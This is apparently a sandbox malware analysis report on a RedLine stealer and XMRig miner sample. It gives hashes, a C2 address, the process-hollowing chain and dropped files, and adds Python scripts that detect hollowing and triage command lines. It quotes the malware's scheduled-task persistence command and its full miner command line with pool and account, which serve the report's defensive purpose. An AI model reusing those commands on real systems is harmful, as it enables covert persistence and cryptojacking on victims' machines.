Analysis
- max time kernel: 144s
- max time network: 157s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 14-07-2021 16:59
Static task: static1
Behavioral task: behavioral1
- Sample: mixruzki_20210714-064055.exe
- Resource: win7v20210410
General
- Target: mixruzki_20210714-064055.exe
- Size: 363KB
- MD5: e82ce292a4c410c44c1f4da25d02a167
- SHA1: 61d4f9a1ea9457e667006bb8c8911c91ab00c487
- SHA256: 299dc3bb613a10e1a2d96c3e49d62d42145b1a48fbd6a087da6cc56661e82546
- SHA512: 0bc579f87ed5466d30466ae10df8378417c1d8424a867bc488faf09558967ca592846148b8ea77b7c6a729e5c754cd4d77b9f23346b0669906467a0d487a3971
Malware Config
Extracted
- Family: redline
- Botnet ID: test1
- C2: 185.215.113.63:23098
Signatures
- RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
- RedLine Payload (2 IoCs)
  YARA rule family_redline matched:
  - behavioral2/memory/2636-119-0x0000000000400000-0x000000000041E000-memory.dmp
  - behavioral2/memory/2636-120-0x0000000000417EA2-mapping.dmp
- XMRig Miner Payload (3 IoCs)
  YARA rule xmrig matched:
  - behavioral2/memory/2628-162-0x0000000140000000-0x0000000140758000-memory.dmp
  - behavioral2/memory/2628-163-0x00000001402EB66C-mapping.dmp
  - behavioral2/memory/2628-165-0x0000000140000000-0x0000000140758000-memory.dmp
- Downloads MZ/PE file
- Executes dropped EXE (3 IoCs)
  - PID 3472: 71120815.exe
  - PID 3164: sihost64.exe
  - PID 2104: services64.exe
- Cryptocurrency Miner
  Makes network request to known mining pool URL. The pool is visible in the explorer.exe command line in the process tree below (xmr.pool.minergate.com).
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Legitimate hosting services abused for malware hosting/C2 (1 TTP)
- Suspicious use of SetThreadContext (2 IoCs)
  - PID 3128 (mixruzki_20210714-064055.exe) set thread context of PID 2636 (mixruzki_20210714-064055.exe)
  - PID 2104 (services64.exe) set thread context of PID 2628 (explorer.exe)
  Both pairs are the process-hollowing sequence: the parent starts a child, overwrites its memory (see the WriteProcessMemory counts below) and redirects the main thread into the written image. The first pair hollows a second copy of the sample itself (the RedLine payload); the second hollows a genuine C:\Windows\explorer.exe so the miner runs under a trusted image name.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox's generic description for this signature adds "Likely ransomware behaviour"; nothing else in this report (no file encryption, renaming or ransom note) supports that, and the identified payloads are a stealer and a miner, so treat the ransomware label as unsupported here.
- Creates scheduled task(s) (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  - PID 2380: schtasks.exe
  - PID 2192: schtasks.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  - PID 2636: mixruzki_20210714-064055.exe (2 events)
  - PID 3472: 71120815.exe (2 events)
  - PID 2104: services64.exe (1 event)
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  - Token: SeDebugPrivilege, PID 2636 (mixruzki_20210714-064055.exe)
  - Token: SeDebugPrivilege, PID 3472 (71120815.exe)
  - Token: SeDebugPrivilege, PID 2104 (services64.exe)
  - Token: SeLockMemoryPrivilege, PID 2628 (explorer.exe), twice
  SeDebugPrivilege is what the three loader processes need to open and write other processes. SeLockMemoryPrivilege is the privilege XMRig enables to allocate large pages for RandomX, which is consistent with the xmrig YARA hit on PID 2628.
- Suspicious use of WriteProcessMemory (37 IoCs)
  Writes grouped by source → target (counts from the event table):
  - PID 3128 mixruzki_20210714-064055.exe → PID 2636 mixruzki_20210714-064055.exe: 8
  - PID 2636 mixruzki_20210714-064055.exe → PID 3472 71120815.exe: 2
  - PID 3472 71120815.exe → PID 360 cmd.exe: 2
  - PID 360 cmd.exe → PID 2380 schtasks.exe: 2
  - PID 3472 71120815.exe → PID 3164 sihost64.exe: 2
  - PID 3472 71120815.exe → PID 2104 services64.exe: 2
  - PID 2104 services64.exe → PID 2324 cmd.exe: 2
  - PID 2324 cmd.exe → PID 2192 schtasks.exe: 2
  - PID 2104 services64.exe → PID 2628 explorer.exe: 15
  The pairs with two writes are what any parent produces while creating a child (cmd.exe → schtasks.exe shows the same count). The 8-write and 15-write pairs are exactly the two SetThreadContext pairs above, which is the hollowing pattern to alert on.
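The correlation described above, written out as an added example that is not part of this report or of the sandbox: it rebuilds the process tree from the write edges and flags the (source, target) pairs that received both a SetThreadContext and more writes than process creation explains. The event rows are constructed from the report's tables (PIDs, image names and write counts are the report's); the tuple layout, the `NORMAL_CREATE_WRITES` threshold and the `SYSTEM_IMAGES` list are assumptions of the example.

```python
"""Flag process-hollowing candidates by correlating cross-process memory
writes with thread-context changes, then rebuild the process tree.

The event rows are constructed from this report's WriteProcessMemory and
SetThreadContext signature tables (PIDs, image names and write counts are
the report's); the tuple layout is a simplified, hypothetical log format,
not the sandbox's own.  The thresholds are an added heuristic.
"""
from collections import Counter, defaultdict

MIX = "mixruzki_20210714-064055.exe"

# (api, source_pid, source_image, target_pid, target_image)
EVENTS = (
    [("WriteProcessMemory", 3128, MIX, 2636, MIX)] * 8
    + [("WriteProcessMemory", 2636, MIX, 3472, "71120815.exe")] * 2
    + [("WriteProcessMemory", 3472, "71120815.exe", 360, "cmd.exe")] * 2
    + [("WriteProcessMemory", 360, "cmd.exe", 2380, "schtasks.exe")] * 2
    + [("WriteProcessMemory", 3472, "71120815.exe", 3164, "sihost64.exe")] * 2
    + [("WriteProcessMemory", 3472, "71120815.exe", 2104, "services64.exe")] * 2
    + [("WriteProcessMemory", 2104, "services64.exe", 2324, "cmd.exe")] * 2
    + [("WriteProcessMemory", 2324, "cmd.exe", 2192, "schtasks.exe")] * 2
    + [("WriteProcessMemory", 2104, "services64.exe", 2628, "explorer.exe")] * 15
    + [
        ("SetThreadContext", 3128, MIX, 2636, MIX),
        ("SetThreadContext", 2104, "services64.exe", 2628, "explorer.exe"),
    ]
)

# Windows binaries that never legitimately get a new entry point from a
# parent living in a user profile directory (assumed list).
SYSTEM_IMAGES = {"explorer.exe", "svchost.exe", "dllhost.exe", "regsvr32.exe", "regasm.exe"}

# A parent performs a write or two into a fresh child while creating it
# (process parameters).  More than that, plus a SetThreadContext on the
# same child, is the hollowing pattern.  Threshold is an assumption.
NORMAL_CREATE_WRITES = 2


def summarize(events):
    """Index the event list: write counts per (source, target), the set of
    SetThreadContext pairs, pid -> image name, and parent -> children."""
    writes, ctx, images, children = Counter(), set(), {}, defaultdict(set)
    for api, spid, simg, tpid, timg in events:
        images[spid], images[tpid] = simg, timg
        if api == "WriteProcessMemory":
            writes[(spid, tpid)] += 1
            # In this report every process written to by another was also
            # spawned by it, so write edges double as parent->child edges.
            if spid != tpid:
                children[spid].add(tpid)
        elif api == "SetThreadContext":
            ctx.add((spid, tpid))
    return writes, ctx, images, children


def find_hollowing(events):
    """One finding per (source, target) pair that received both a
    SetThreadContext and more writes than process creation explains."""
    writes, ctx, images, _ = summarize(events)
    findings = []
    for spid, tpid in sorted(ctx):
        n = writes[(spid, tpid)]
        if n <= NORMAL_CREATE_WRITES:
            continue
        target = images[tpid].lower()
        findings.append({
            "source": spid, "source_image": images[spid],
            "target": tpid, "target_image": images[tpid],
            "writes": n,
            # A system binary as hollowing target means the payload runs
            # under a trusted-looking image name (here: explorer.exe).
            "masquerade": target in SYSTEM_IMAGES and target != images[spid].lower(),
        })
    return findings


def render_tree(events, root):
    """Indented 'pid image' lines for the process tree under `root`."""
    _, _, images, children = summarize(events)
    lines = []

    def walk(pid, depth):
        lines.append("  " * depth + f"{pid} {images[pid]}")
        for child in sorted(children[pid]):
            walk(child, depth + 1)

    walk(root, 0)
    return lines


if __name__ == "__main__":
    print("\n".join(render_tree(EVENTS, 3128)))
    for f in find_hollowing(EVENTS):
        flag = " (masquerading as a system binary)" if f["masquerade"] else ""
        print(f"hollowing: {f['source']} {f['source_image']} -> "
              f"{f['target']} {f['target_image']}, {f['writes']} writes{flag}")
```

Run stand-alone it prints the ten-process tree rooted at PID 3128 and two findings: services64.exe → explorer.exe (15 writes, masquerading) and the sample → its own second instance (8 writes). The cmd.exe → schtasks.exe pairs stay below the threshold and are not reported, which is the point of comparing against a creation baseline rather than alerting on every cross-process write.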
Processes
- C:\Users\Admin\AppData\Local\Temp\mixruzki_20210714-064055.exe (PID 3128)
  "C:\Users\Admin\AppData\Local\Temp\mixruzki_20210714-064055.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\mixruzki_20210714-064055.exe (PID 2636; second instance of the same binary, hollowed by PID 3128, RedLine payload in memory)
    C:\Users\Admin\AppData\Local\Temp\mixruzki_20210714-064055.exe
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\71120815.exe (PID 3472)
      "C:\Users\Admin\AppData\Local\Temp\71120815.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\System32\cmd.exe (PID 360)
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
        - Suspicious use of WriteProcessMemory
        - C:\Windows\system32\schtasks.exe (PID 2380)
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
          - Creates scheduled task(s)
      - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe (PID 3164)
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        - Executes dropped EXE
      - C:\Users\Admin\AppData\Local\Temp\services64.exe (PID 2104; same hashes as 71120815.exe, see Downloads)
        "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - C:\Windows\System32\cmd.exe (PID 2324)
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
          - Suspicious use of WriteProcessMemory
          - C:\Windows\system32\schtasks.exe (PID 2192)
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
            - Creates scheduled task(s)
        - C:\Windows\explorer.exe (PID 2628; genuine explorer.exe path, hollowed by services64.exe, XMRig payload in memory)
          C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com --user=hidminer@protonmail.com --pass= --cpu-max-threads-hint=30 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth
          - Suspicious use of AdjustPrivilegeToken
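Two command lines in the tree carry the whole story: the schtasks /create call (issued once by the dropper 71120815.exe and again, with the same task name, by services64.exe itself, so the task is re-registered on every run) and the miner options handed to a process whose image is explorer.exe. The following is an added example, not code from this report or from the sandbox, that parses both the way a triage script would. The command lines are the report's; the tokenizer, the `USER_WRITABLE` and `HOST_IMAGES` lists and the scoring rules are assumptions of the example.

```python
"""Triage the two command lines that carry this sample's persistence and
payload: the schtasks /create invocation and the XMRig-style options handed
to a process whose image name is explorer.exe.  Command lines are copied
from the process tree above; the tokenizer, field extraction and scoring
rules are an added heuristic, not part of the sandbox or any vendor tool."""
import re

SCHTASKS_CMD = r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit'''
MINER_CMD = (
    r"C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto "
    r"--cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr "
    r"--cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com "
    r"--user=hidminer@protonmail.com --pass= --cpu-max-threads-hint=30 "
    r"--cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth"
)

# Quoted spans stay together; cmd.exe passes single quotes through literally,
# which is why the task action is wrapped in '"..."' here.
TOKEN = re.compile(r"""'[^']*'|"[^"]*"|\S+""")
USER_WRITABLE = (r"\appdata\local\temp", r"\appdata\roaming", r"\programdata", r"\users\public")
PERSISTENT_TRIGGERS = {"onlogon", "onstart", "onidle"}
# Options that only a miner (XMRig or a fork) understands (assumed subset).
XMRIG_OPTIONS = {"--url", "--user", "--pass", "--algo", "--coin",
                 "--randomx-mode", "--cpu-max-threads-hint", "--donate-level"}
# Windows binaries that never take such options themselves; seeing them
# means the real code runs inside a hollowed or injected host process.
HOST_IMAGES = {"explorer.exe", "svchost.exe", "dllhost.exe", "conhost.exe"}


def tokenize(cmdline):
    return [t.strip("'\"") for t in TOKEN.findall(cmdline)]


def parse_schtasks(tokens):
    """Fields and findings for a schtasks invocation, or None if absent."""
    low = [t.lower() for t in tokens]
    idx = next((i for i, t in enumerate(low)
                if t in ("schtasks", "schtasks.exe") or t.endswith("\\schtasks.exe")), None)
    if idx is None:
        return None
    args = tokens[idx + 1:]
    if "&" in args:                     # drop anything chained after the task command
        args = args[:args.index("&")]
    flags = {a.lower() for a in args if a.startswith("/")}
    opts = {a.lower(): args[i + 1] for i, a in enumerate(args[:-1])
            if a.lower() in ("/sc", "/rl", "/tn", "/tr")}
    action = opts.get("/tr", "")
    info = {"kind": "schtasks", "task_name": opts.get("/tn", ""),
            "trigger": opts.get("/sc", "").lower(), "run_level": opts.get("/rl", "").lower(),
            "action": action, "force": "/f" in flags,
            "user_writable": any(p in action.lower() for p in USER_WRITABLE), "findings": []}
    if "/create" in flags:
        if info["trigger"] in PERSISTENT_TRIGGERS:
            info["findings"].append(f"task fires on {info['trigger']} (persistence)")
        if info["run_level"] == "highest":
            info["findings"].append("task requests the highest run level")
        if info["user_writable"]:
            info["findings"].append("task action lives in a user-writable directory")
        if info["force"]:
            info["findings"].append("/f silently replaces an existing task of the same name")
    return info


def parse_miner(image, tokens):
    """Pool, account and algorithm from XMRig-style --key=value options."""
    opts = {}
    for t in tokens[1:]:
        if t.startswith("--"):
            key, _, value = t.partition("=")
            opts[key.lower()] = value
    if len(XMRIG_OPTIONS.intersection(opts)) < 2:
        return None
    basename = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    info = {"kind": "miner", "pool": opts.get("--url", ""), "user": opts.get("--user", ""),
            "algo": opts.get("--algo", ""), "host_masquerade": basename in HOST_IMAGES,
            "findings": []}
    if info["pool"]:
        info["findings"].append(f"miner configured for pool {info['pool']}")
    if info["host_masquerade"]:
        info["findings"].append(f"{basename} does not take miner options: hollowed/injected host")
    loader_opts = sorted(k for k in opts if k.startswith("--cinit-"))
    if loader_opts:   # not upstream XMRig options; they mark a loader-modified build
        info["findings"].append("loader-specific options: " + ", ".join(loader_opts))
    return info


def triage_command_line(image, cmdline):
    tokens = tokenize(cmdline)
    return parse_schtasks(tokens) or parse_miner(image, tokens) or {"kind": "other", "findings": []}


if __name__ == "__main__":
    for image, cmd in ((r"C:\Windows\System32\cmd.exe", SCHTASKS_CMD),
                       (r"C:\Windows\explorer.exe", MINER_CMD)):
        result = triage_command_line(image, cmd)
        print(result["kind"], *result["findings"], sep="\n  ")
```

On a live host the same task can be confirmed with `schtasks /Query /TN services64 /V /FO LIST`; the fields to compare are the trigger (logon), run level (highest) and the action path under the user's Temp directory, which is what the parser scores. The miner parser keys on option names rather than on the image, because the image here is the real C:\Windows\explorer.exe; only the arguments give it away.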
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mixruzki_20210714-064055.exe.log
  MD5 7438b57da35c10c478469635b79e33e1
  SHA1 5ffcbdfbfd800f67d6d9d6ee46de2eb13fcbb9a5
  SHA256 b253c066d4a6604aaa5204b09c1edde92c410b0af351f3760891f5e56c867f70
  SHA512 5887796f8ceb1c5ae790caff0020084df49ea8d613b78656a47dc9a569c5c86a9b16ec2ebe0d6f34c5e3001026385bb1282434cc3ffc7bda99427c154c04b45a
  A CLR UsageLogs entry is written when the .NET 4 runtime runs in a process of that name (here the 32-bit CLR), consistent with the C# RedLine payload executing inside the hollowed second instance of the sample.
- C:\Users\Admin\AppData\Local\Temp\71120815.exe
  MD5 ef460c0a6998ba8f81b18efbd42ef21d
  SHA1 27e5a5345ae708facb0a644648a6e84fa7fc4899
  SHA256 63d38ae546f811d04a1c9bf42a30c555d17cf0a58710fa10d952b7aca0c916f4
  SHA512 660e2e230d2db3132a890ba419628bfbe1174002d74b166323d7eebf4775900aa383ebcd179564f4155beb804e269d02ebaba9e2d5e65ae0405699c9d3ee9a2b
- C:\Users\Admin\AppData\Local\Temp\services64.exe
  MD5 ef460c0a6998ba8f81b18efbd42ef21d
  SHA1 27e5a5345ae708facb0a644648a6e84fa7fc4899
  SHA256 63d38ae546f811d04a1c9bf42a30c555d17cf0a58710fa10d952b7aca0c916f4
  SHA512 660e2e230d2db3132a890ba419628bfbe1174002d74b166323d7eebf4775900aa383ebcd179564f4155beb804e269d02ebaba9e2d5e65ae0405699c9d3ee9a2b
  Identical hashes to 71120815.exe: services64.exe is a byte-for-byte copy of the dropped loader, renamed and registered as the scheduled task target.
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
  MD5 0c0195c48b6b8582fa6f6373032118da
  SHA1 d25340ae8e92a6d29f599fef426a2bc1b5217299
  SHA256 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
  SHA512 ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
  A kernel driver written under a user profile directory is an indicator on its own; on an affected host check whether it was loaded as a service.
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  MD5 5cb459f1bd32583f0f8488777d5b85ab
  SHA1 3cf61e2dfab52fa45ec8fc70f7a2f62a7d9e4e02
  SHA256 044b03caef2acf7273c10472a8d7c6e43df2d4c0f5d371497885b1eb881f803d
  SHA512 1dd0285756c20bc03a70703f9431b86ec331bc591b19deae752064d46d4d7cd05e2afde04306dcb147ba6e218ab4b1dbe78e27f37297ac1256a19f80e6d6a7fb
-
Memory dumps (grouped by PID; the dumps matched by YARA are 2636-119/2636-120 for RedLine and 2628-162/2628-163/2628-165 for XMRig, and those are the ones to pull for configuration extraction)
- memory/360-141-0x0000000000000000-mapping.dmp
- memory/2104-147-0x0000000000000000-mapping.dmp
- memory/2104-159-0x00000000010E0000-0x00000000010E2000-memory.dmp (8KB)
- memory/2104-160-0x000000001C230000-0x000000001C231000-memory.dmp (4KB)
- memory/2192-157-0x0000000000000000-mapping.dmp
- memory/2324-156-0x0000000000000000-mapping.dmp
- memory/2380-142-0x0000000000000000-mapping.dmp
- memory/2628-162-0x0000000140000000-0x0000000140758000-memory.dmp (7.3MB)
- memory/2628-163-0x00000001402EB66C-mapping.dmp
- memory/2628-164-0x0000000002990000-0x00000000029B0000-memory.dmp (128KB)
- memory/2628-165-0x0000000140000000-0x0000000140758000-memory.dmp (7.3MB)
- memory/2636-119-0x0000000000400000-0x000000000041E000-memory.dmp (120KB)
- memory/2636-120-0x0000000000417EA2-mapping.dmp
- memory/2636-124-0x0000000005710000-0x0000000005711000-memory.dmp (4KB)
- memory/2636-125-0x0000000005190000-0x0000000005191000-memory.dmp (4KB)
- memory/2636-126-0x00000000051F0000-0x00000000051F1000-memory.dmp (4KB)
- memory/2636-127-0x0000000005230000-0x0000000005231000-memory.dmp (4KB)
- memory/2636-128-0x0000000005100000-0x0000000005706000-memory.dmp (6.0MB)
- memory/2636-129-0x00000000054A0000-0x00000000054A1000-memory.dmp (4KB)
- memory/2636-130-0x0000000006710000-0x0000000006711000-memory.dmp (4KB)
- memory/2636-131-0x0000000006E10000-0x0000000006E11000-memory.dmp (4KB)
- memory/2636-132-0x00000000068E0000-0x00000000068E1000-memory.dmp (4KB)
- memory/2636-133-0x0000000006BF0000-0x0000000006BF1000-memory.dmp (4KB)
- memory/2636-134-0x0000000007840000-0x0000000007841000-memory.dmp (4KB)
- memory/3128-114-0x0000000000120000-0x0000000000121000-memory.dmp (4KB)
- memory/3128-116-0x0000000004980000-0x0000000004981000-memory.dmp (4KB)
- memory/3128-117-0x0000000004900000-0x0000000004901000-memory.dmp (4KB)
- memory/3128-118-0x0000000004B30000-0x0000000004B31000-memory.dmp (4KB)
- memory/3164-144-0x0000000000000000-mapping.dmp
- memory/3164-148-0x00000000006A0000-0x00000000006A1000-memory.dmp (4KB)
- memory/3164-154-0x0000000000F10000-0x0000000000F12000-memory.dmp (8KB)
- memory/3164-158-0x000000001C310000-0x000000001C312000-memory.dmp (8KB)
- memory/3472-135-0x0000000000000000-mapping.dmp
- memory/3472-138-0x00000000005E0000-0x00000000005E1000-memory.dmp (4KB)
- memory/3472-140-0x0000000000E00000-0x0000000000E0B000-memory.dmp (44KB)
- memory/3472-143-0x0000000000DD0000-0x0000000000DD2000-memory.dmp (8KB)
The two single-address mapping dumps that matter, 2636-120 at 0x417EA2 and 2628-163 at 0x1402EB66C, sit inside the 0x400000-0x41E000 and 0x140000000-0x140758000 image regions dumped for the same PIDs, and those PIDs are exactly the two SetThreadContext targets (3128 → 2636, 2104 → 2628) listed under Signatures. 0x140000000 is the default image base for 64-bit PE files, so the 7.3MB region in explorer.exe (PID 2628) is a complete 64-bit image written over the host process, not explorer's own code.